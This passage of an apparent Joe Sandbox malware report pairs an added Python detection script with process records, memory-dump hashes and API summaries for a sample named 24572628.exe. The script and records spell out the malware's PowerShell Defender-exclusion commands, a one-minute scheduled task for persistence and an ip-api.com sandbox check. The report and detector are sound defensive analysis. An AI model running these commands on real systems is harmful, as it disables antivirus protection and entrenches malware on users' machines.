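The chain recorded in Target IDs 3 to 17 (the dropped 24572628.exe adds Defender exclusions through powershell.exe -ExecutionPolicy Bypass Add-MpPreference, registers a scheduled task that starts the extensionless copy at C:\ProgramData\coding every minute, and that copy then runs), together with the ip-api.com hosting lookup in the HTTP session above, can be flagged from command lines and request lines alone. The Python below is an added example, not code from the report or from Joe Sandbox: the process records and the HTTP request line are constructed from the values the report shows, and the rule names and the five-minute frequency threshold are this example's own assumptions.

```python
"""Flag the behaviour chain this report records: Defender exclusions added
through PowerShell, a scheduled task that re-launches an extensionless binary
under C:\\ProgramData every minute, that binary executing, and the ip-api.com
"hosting" lookup the sample uses to recognise data-center (sandbox) hosts.

Added example; not code from the report or from Joe Sandbox. PROCESSES and
HTTP_REQUESTS are constructed from the report's values; the rule names and
the five-minute frequency threshold are this example's own assumptions.
"""
import ntpath
import re
from typing import NamedTuple


class Finding(NamedTuple):
    target_id: int
    rule: str
    detail: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed from the "Commandline" fields of Target IDs 3, 4, 8, 11, 13, 15 and 17:
# target id -> (image path, arguments).
PROCESSES = {
    3: (r"C:\Users\user\Desktop\24572628.exe", ""),
    4: (PS, r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'"),
    8: (PS, r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'"),
    11: (PS, r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'"),
    13: (PS, r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'"),
    15: (r"C:\Windows\System32\schtasks.exe",
         r'/create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"'),
    17: (r"C:\ProgramData\coding", ""),
}

# Constructed from the ip-api.com session above (PID 7544 is Target ID 3).
HTTP_REQUESTS = [(3, "ip-api.com", "GET /line/?fields=hosting HTTP/1.1")]

EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+['\"]?([^'\"]+)", re.I)
# schtasks switches: "/name value" where the value may be quoted; bare switches like /f get ''.
SCHTASK_OPT = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^/\s]\S*))?')


def in_staging_dir(path: str) -> bool:
    """Directories a user-writable payload is typically parked in."""
    p = path.lower()
    return any(d in p for d in ("c:\\programdata\\", "\\appdata\\", "\\temp\\"))


def lacks_extension(path: str) -> bool:
    """'C:\\ProgramData\\coding' is a PE with no .exe suffix: a weak but cheap signal."""
    return ntpath.splitext(ntpath.basename(path))[1] == ""


def check_image(tid, image, args, out):
    if in_staging_dir(image) and lacks_extension(image):
        out.append(Finding(tid, "extensionless_binary_in_staging_dir", image))


def check_powershell(tid, image, args, out):
    if ntpath.basename(image).lower() != "powershell.exe":
        return
    if re.search(r"-ExecutionPolicy\s+Bypass", args, re.I):
        out.append(Finding(tid, "ps_execution_policy_bypass", args))
    m = EXCLUSION.search(args)
    if m:  # -ExclusionPath / -ExclusionProcess / -ExclusionExtension
        out.append(Finding(tid, "defender_exclusion_" + m.group(1).lower(), m.group(2).strip()))


def check_schtasks(tid, image, args, out):
    if ntpath.basename(image).lower() != "schtasks.exe" or not re.search(r"/create\b", args, re.I):
        return
    opt = {k.lower(): v.strip('"') for k, v in SCHTASK_OPT.findall(args)}
    sched, every = opt.get("sc", "").lower(), opt.get("mo", "")
    if sched == "minute" and every.isdigit() and int(every) <= 5:  # threshold is an assumption
        out.append(Finding(tid, "schtask_high_frequency", f"/sc {sched} /mo {every}"))
    action = opt.get("tr", "")
    if opt.get("rl", "").upper() == "HIGHEST" and (in_staging_dir(action) or lacks_extension(action)):
        out.append(Finding(tid, "schtask_highest_to_staging_dir", action))


def check_hosting_lookup(tid, host, request_line, out):
    """ip-api.com's 'hosting' field says whether the client IP sits in a data-center range."""
    if host.lower() == "ip-api.com" and re.search(r"[?&]fields=[^ ]*hosting", request_line):
        out.append(Finding(tid, "ip_api_hosting_check", request_line))


def hosting_verdict(data_raw: str) -> bool:
    """Decode the report's 'Data Raw' hex; 'true' means the sandbox IP looked like hosting space."""
    return bytes.fromhex(data_raw).decode("ascii").strip().lower() == "true"


def triage(processes=PROCESSES, requests=HTTP_REQUESTS) -> list:
    out = []
    for tid, (image, args) in processes.items():
        check_image(tid, image, args, out)
        check_powershell(tid, image, args, out)
        check_schtasks(tid, image, args, out)
    for tid, host, line in requests:
        check_hosting_lookup(tid, host, line, out)
    return out


if __name__ == "__main__":
    for f in triage():
        print(f"target {f.target_id:>2}  {f.rule:<38} {f.detail}")
```

Running triage() on the constructed records yields twelve findings: four -ExecutionPolicy Bypass hits, four Defender exclusions (two paths, two process names), two for the scheduled task, one for the extensionless binary started from C:\ProgramData, and one for the hosting lookup. hosting_verdict() decodes the "Data Raw" hex of the ip-api.com response; the answer captured here was "false", i.e. the analysis IP was not classified as hosting space.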

                                                                                        Target ID:18
                                                                                        Start time:00:01:37
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\OpenWith.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                        Imagebase:0x7ff7959f0000
                                                                                        File size:123'984 bytes
                                                                                        MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:00:01:37
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7e52b0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:20
                                                                                        Start time:00:01:45
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\OpenWith.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                        Imagebase:0x7ff7959f0000
                                                                                        File size:123'984 bytes
                                                                                        MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:00:02:01
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\ProgramData\coding
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\ProgramData\coding
                                                                                        Imagebase:0xb60000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2275174327.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff848a40000_YPzNsfg4nR.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b2a972328e854e320d70eed23c75e4236af0dd63932f4703831f312a823ab2a
                                                                                          • Instruction ID: 65b917e0d8b391717b4e2c40a1b0336d7076fe7b005387ee81a61bf812e46139
                                                                                          • Opcode Fuzzy Hash: 8b2a972328e854e320d70eed23c75e4236af0dd63932f4703831f312a823ab2a
                                                                                          • Instruction Fuzzy Hash: DFC1BD30A0D9498FEBD8FB6CC456AAD77E1EF59780F4401B9D00DCB297DE68AC418762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2275174327.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff848a40000_YPzNsfg4nR.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4136b21b924b3c26f6058a59f477fefce7078fa4e6ca2b6bd750e1558c280955
                                                                                          • Instruction ID: a634f9c21d9c20c2a612d7907240512179b42f8cbe457619f4782530b657a1f8
                                                                                          • Opcode Fuzzy Hash: 4136b21b924b3c26f6058a59f477fefce7078fa4e6ca2b6bd750e1558c280955
                                                                                          • Instruction Fuzzy Hash: 4FF02833E0EA5C9FEBA4F998BC035E9BB94FB82764F04012ED15CC7193D6565512C346

                                                                                          Execution Graph

                                                                                          Execution Coverage:27.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:30%
                                                                                          Total number of Nodes:10
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph (rendered graph not reproduced): node 7ff848a49da8 calls SetWindowsHookExW; node 7ff848a49758 reaches 7ff848a49902, which calls RtlSetProcessIsCritical; node 7ff848a47a81 calls CheckRemoteDebuggerPresent

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CAO_^
                                                                                          • API String ID: 0-3111533842
                                                                                          • Opcode ID: 80fd8647bcc297e7808993d96842d59bc5508b803f8da70c1d3c27dae35d9ba1
                                                                                          • Instruction ID: 2179cd035cf2d1dd84762b3a09dc8628354dc931cead1e27671ac335c34a9b2d
                                                                                          • Opcode Fuzzy Hash: 80fd8647bcc297e7808993d96842d59bc5508b803f8da70c1d3c27dae35d9ba1
                                                                                          • Instruction Fuzzy Hash: 6832B560F2DA559FEB94FB38945A279B7D2FF88B80F440579D40EC3287DE68AC018742

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (rendered graph not reproduced): function covering 7ff848a41719-7ff848a41fc6, calling internal subroutines only (no Windows API calls in this graph)
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CAO_^
                                                                                          • API String ID: 0-3111533842
                                                                                          • Opcode ID: 7445596f5be5703a3930d9eb5f218c3e2953512881affececd6b800d3bb148ca
                                                                                          • Instruction ID: 30238790d9641d8cc19656d048e0ef189c3e199be52cc2b08c1d936ba3e8a860
                                                                                          • Opcode Fuzzy Hash: 7445596f5be5703a3930d9eb5f218c3e2953512881affececd6b800d3bb148ca
                                                                                          • Instruction Fuzzy Hash: E322C660F2DA595FEB98FB38945A2B976D2FF88B80F440579D40EC32C7DE68AC018751

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (rendered graph not reproduced): function covering 7ff848a47a81-7ff848a47b88, calling CheckRemoteDebuggerPresent
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 36d66c98cb0fb942b6c7a24302ef17dda0a13ab4f4a21c14c130eb2cea910986
                                                                                          • Instruction ID: fa5851f79cdb3b88f6b07204ad4caac973945b5eba917da76d3f122d184c20e9
                                                                                          • Opcode Fuzzy Hash: 36d66c98cb0fb942b6c7a24302ef17dda0a13ab4f4a21c14c130eb2cea910986
                                                                                          • Instruction Fuzzy Hash: 0031223190875C8FCB58DF6CC88A7E97BE0FF65311F05426AD489D7292CB74A846CB91

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (rendered graph not reproduced): function covering 7ff848a460c6-7ff848a46583, calling internal subroutine 7ff848a46584 only (no Windows API calls in this graph)
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86e90689477525ead5abe44d0d0ac29494407e65c91a5061f3911b7d34146a5f
                                                                                          • Instruction ID: 42b88930d5fecd33a74e6a068c2a21238fd47a773b7d720b20b84058e3fdc665
                                                                                          • Opcode Fuzzy Hash: 86e90689477525ead5abe44d0d0ac29494407e65c91a5061f3911b7d34146a5f
                                                                                          • Instruction Fuzzy Hash: E0F1943090DA8D8FEFA8EF28C8567E937E1FF54350F04426AD84DC7295CB74A9458B92

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (rendered graph not reproduced): function covering 7ff848a46e72-7ff848a472ff, calling internal subroutine 7ff848a47300 only (no Windows API calls in this graph)
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0a1bf71a83393298b81e17aae9e0f3e506a50731e407f522304108d9a42dee2
                                                                                          • Instruction ID: b1e26d22d2c2e00d0fc1e1086dd0970c61aee8d21192cdbbef805b8ddcd9a591
                                                                                          • Opcode Fuzzy Hash: e0a1bf71a83393298b81e17aae9e0f3e506a50731e407f522304108d9a42dee2
                                                                                          • Instruction Fuzzy Hash: EBE1C53050DA8D8FEFA8EF28C8567E977E1FF54350F04426AD84DC7295CB7898448B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d4f23ca38155ed8ff45866c99de4cea48162ba04451d18d100548ecb1680a1fd
                                                                                          • Instruction ID: 28cf5dc15c7fc7b7f60e0785b0ceefb3051e014905c1df9839f9455409970096
                                                                                          • Opcode Fuzzy Hash: d4f23ca38155ed8ff45866c99de4cea48162ba04451d18d100548ecb1680a1fd
                                                                                          • Instruction Fuzzy Hash: 24512F20A1E6C95FDB86AB7C58652767FE0DF87669F0800FAE08EC71D7DE480846C356

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: f8f0d57a34dde0771350cd2813fdbb07f0860154bf78192f9774122aa9b1b2f9
                                                                                          • Instruction ID: 8e139c91778db993c784e78a1719c4fa51aae4844141f4b917eb3ff11a7883a6
                                                                                          • Opcode Fuzzy Hash: f8f0d57a34dde0771350cd2813fdbb07f0860154bf78192f9774122aa9b1b2f9
                                                                                          • Instruction Fuzzy Hash: A9813831D0E6C54FEB16EB6C581A6F97FE0FF12760F1800BFD08987193EA6858468756
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 6e9115f855d9aaddf5ba937f43233d2b971494d0e2fa946ba83b6f6cffec277f
                                                                                          • Instruction ID: a55c5a6f69d02249f74305f88da94f61215fa9fcff78b6031e0f109b69a535e7
                                                                                          • Opcode Fuzzy Hash: 6e9115f855d9aaddf5ba937f43233d2b971494d0e2fa946ba83b6f6cffec277f
                                                                                          • Instruction Fuzzy Hash: CE51493180DA848FEB1AEB6C984A6F97FE0FF51720F18007FD08987193DB646845C796

                                                                                          Control-flow Graph

                                                                                          control_flow_graph (rendered graph not reproduced): function covering 7ff848a49da8-7ff848a49ebd, calling SetWindowsHookExW
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 91c99edd2c91de99dea9ec65ea6a4d4f5b1fadd956880d344d55fa8338b32f83
• Instruction ID: 725f532995d55d84fb3d27b5b791f90bb3f02fa64ff320afc939c5604dab9c67
• Opcode Fuzzy Hash: 91c99edd2c91de99dea9ec65ea6a4d4f5b1fadd956880d344d55fa8338b32f83
• Instruction Fuzzy Hash: EB310A3091CA5C4FDB18EB6C98466F97BE1EB95721F14023ED009C3292DB756852C7D1
Memory Dump Source
• Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1812b69a0ac20149f34c5bea184f5552d42753f84dddcc69b5f49c8023a1974
• Instruction ID: dcc4799346d82c2de9579bd62e27659deec3d571d00d7954570991556c291187
• Opcode Fuzzy Hash: c1812b69a0ac20149f34c5bea184f5552d42753f84dddcc69b5f49c8023a1974
• Instruction Fuzzy Hash: 8B612527A0E5727AE611FBBDB4555FD7B10DF813B5B0801B7D58C8D483CE04388A82E5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID: KSN
• API String ID: 0-4249579523
• Opcode ID: 1d493c0e36aecaef4e18b964c6b7953db62abbf724a69bbc32d9a7ff22dd406c
• Instruction ID: 09eaf151824d2ac6917dd95d4c71ab758b3e457452feb6ab3f6609e1b45a8037
• Opcode Fuzzy Hash: 1d493c0e36aecaef4e18b964c6b7953db62abbf724a69bbc32d9a7ff22dd406c
• Instruction Fuzzy Hash: 2CF0B43280DA8C8FDF45EF2888295A47FE0FF25341F0401A7D40EC70A1DB64A848C783
Memory Dump Source
• Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e08fd5dac800da4cb472a590efe7c7cba224948fa0165bd72e5d5c52ec62edb
• Instruction ID: b0b904d52a91afd5fdcab005d07156c1859023ce9da216215dfa39fcfad1e7de
• Opcode Fuzzy Hash: 9e08fd5dac800da4cb472a590efe7c7cba224948fa0165bd72e5d5c52ec62edb
• Instruction Fuzzy Hash: 8BD11131D1EA8A5FE799AB6858145B97BE0EF163D0F0801FFD44DCB493EA18AC05C356
Memory Dump Source
• Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d4cf8faa0ac61563ce6cdb0c6972cc2cd352e7ed1ffe2b933b55e6ef54943a1
• Instruction ID: 701eddbe9a08b7c1719cf288b1c65ac3d121ff50049f48bce7b3a742eb74e5b5
• Opcode Fuzzy Hash: 1d4cf8faa0ac61563ce6cdb0c6972cc2cd352e7ed1ffe2b933b55e6ef54943a1
• Instruction Fuzzy Hash: 1B510632E0DA4A4FE799EE2CA411675BBD3EF556A0F1801BAC00DCB596DF24EC158349
Memory Dump Source
• Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbcbe8cbd72955eba8eb61cee8a873ad439d8f9b4a94d3ad05375c958cdc553b
• Instruction ID: 4a865e42aba6c938e43b62880d508106c215c82b4a5ce9c0310864ae3261f1c4
• Opcode Fuzzy Hash: fbcbe8cbd72955eba8eb61cee8a873ad439d8f9b4a94d3ad05375c958cdc553b
• Instruction Fuzzy Hash: 35411A32E0DA494FE7A9EF2CA4516B877D2EF447A0F0801BAC05DCB587EF18AC158385
Memory Dump Source
• Source File: 00000004.00000002.2363224331.00007FF84892D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84892D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff84892d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3162b2727763205b4525af486263aab537e442edf824530db98687fbb0b25a1e
• Instruction ID: c1782429a744909e3cb168aceedf229e8b8e7ed980a197e248de2af3b3561f31
• Opcode Fuzzy Hash: 3162b2727763205b4525af486263aab537e442edf824530db98687fbb0b25a1e
• Instruction Fuzzy Hash: D341237080DBC54FE756DB2898899663FB0EF52362F1506EFD088CB1A3D625A846C792
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6782e97a8cb2238eb39250840f048b79b5af94058284c389052f20c5175828c
• Instruction ID: 58527981afcd6c227853e8c840f51b697ade573e34d1a0f39ccfc14356909c10
• Opcode Fuzzy Hash: f6782e97a8cb2238eb39250840f048b79b5af94058284c389052f20c5175828c
• Instruction Fuzzy Hash: A131F43191CB489FDB18EF5CA80A6F97BE0FB99710F10422FE049D3251DA70A8568BC3
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1bdfb062a5ef76a1c63d3066d253bf5c137107d817a963b238d38fa85b544142
• Instruction ID: 9371b4cf10e637c148358d1d7b7f9ecb61ac1d5c2c537b544e89c9f15cd5e6d4
• Opcode Fuzzy Hash: 1bdfb062a5ef76a1c63d3066d253bf5c137107d817a963b238d38fa85b544142
• Instruction Fuzzy Hash: F521E63190DB8C4FDB59DF6C984A7E9BBE0EB56321F04426BD048C3152DA74A456CB92
Memory Dump Source
• Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c44ff7799bebb8d799ef5e95587eb80d086ee178ea3bda26c83a3ea5221bcb37
• Instruction ID: 8a75ef3fb3238a71b3945dfd6536a3ee74b3bcf5eeb2aedff9580cf24fe7db2f
• Opcode Fuzzy Hash: c44ff7799bebb8d799ef5e95587eb80d086ee178ea3bda26c83a3ea5221bcb37
• Instruction Fuzzy Hash: 0B21F532D0DA8B4FE3A9EE2C9851176ABD3FF516D0F5900B9C01DCB9A2CF18EC148209
Memory Dump Source
• Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55718c34f87b9e2a8b72b2cb0450436485a66a8ec20b9998c7daf0e2ca166d8e
• Instruction ID: 22a1d5f7005df0cedfc616e3c85d72c9c44a6f75b0b2b40da9a4d210600aac07
• Opcode Fuzzy Hash: 55718c34f87b9e2a8b72b2cb0450436485a66a8ec20b9998c7daf0e2ca166d8e
• Instruction Fuzzy Hash: B611C232D0E5464FE6A9EF2CA4A45B877D2EF406E0F5900BAD01DCB996DF19AC108389
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: 3da116da0be1b4c1508acfa62cbd6f92ad9b972e918f88cc15f38a6f0a0fe9be
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: EA01447115CB088FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3655DA26E882CB46
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e8e0665a13af5e0ad7318e461e1e3711317f0930a59325702bf76d65cd17a4a
• Instruction ID: 9ff93c5a55cc5da921e6a1ab776d46e415f1feed4a195b5509c125c16886ffe7
• Opcode Fuzzy Hash: 5e8e0665a13af5e0ad7318e461e1e3711317f0930a59325702bf76d65cd17a4a
• Instruction Fuzzy Hash: 47E0127580894C8FDB44EF1898555E57BA0FB64301B00015AE41DC7160D7719558CBC2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^4$N_^7$N_^F$N_^J
• API String ID: 0-3508309026
• Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
• Instruction ID: f4428ff80c8e499c95de5b7c8e82f3b355c429bcf9004aa7847cd7b3bae16acc
• Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
• Instruction Fuzzy Hash: 4521F6B7A0D5256EE301BBBDFC145FD3B40DF942B474502B3D2A8CB543E914758A8AD2
Memory Dump Source
• Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40efc9cffe2de735fbff286de320574830bef2ce7c03062f5eb66c16d1bb74f9
• Instruction ID: 81d51766ddd569712359c5514d82fc673078ae15760b79547bc9295f1792604a
• Opcode Fuzzy Hash: 40efc9cffe2de735fbff286de320574830bef2ce7c03062f5eb66c16d1bb74f9
• Instruction Fuzzy Hash: D6D18030A0DA4D8FDF88EF68C455AA97BF1FF68340F14416AD449D729ACB74E881CB91
Memory Dump Source
• Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4b389a9b244e4cf0eec8d6f3fa8d6b8f2b772615859c3a15fed389b66fcd30a
• Instruction ID: 86107d579e09de7ee9e3c7d5d2a34d90ee3d88e4f501ebe52857f0bce0cbeaf0
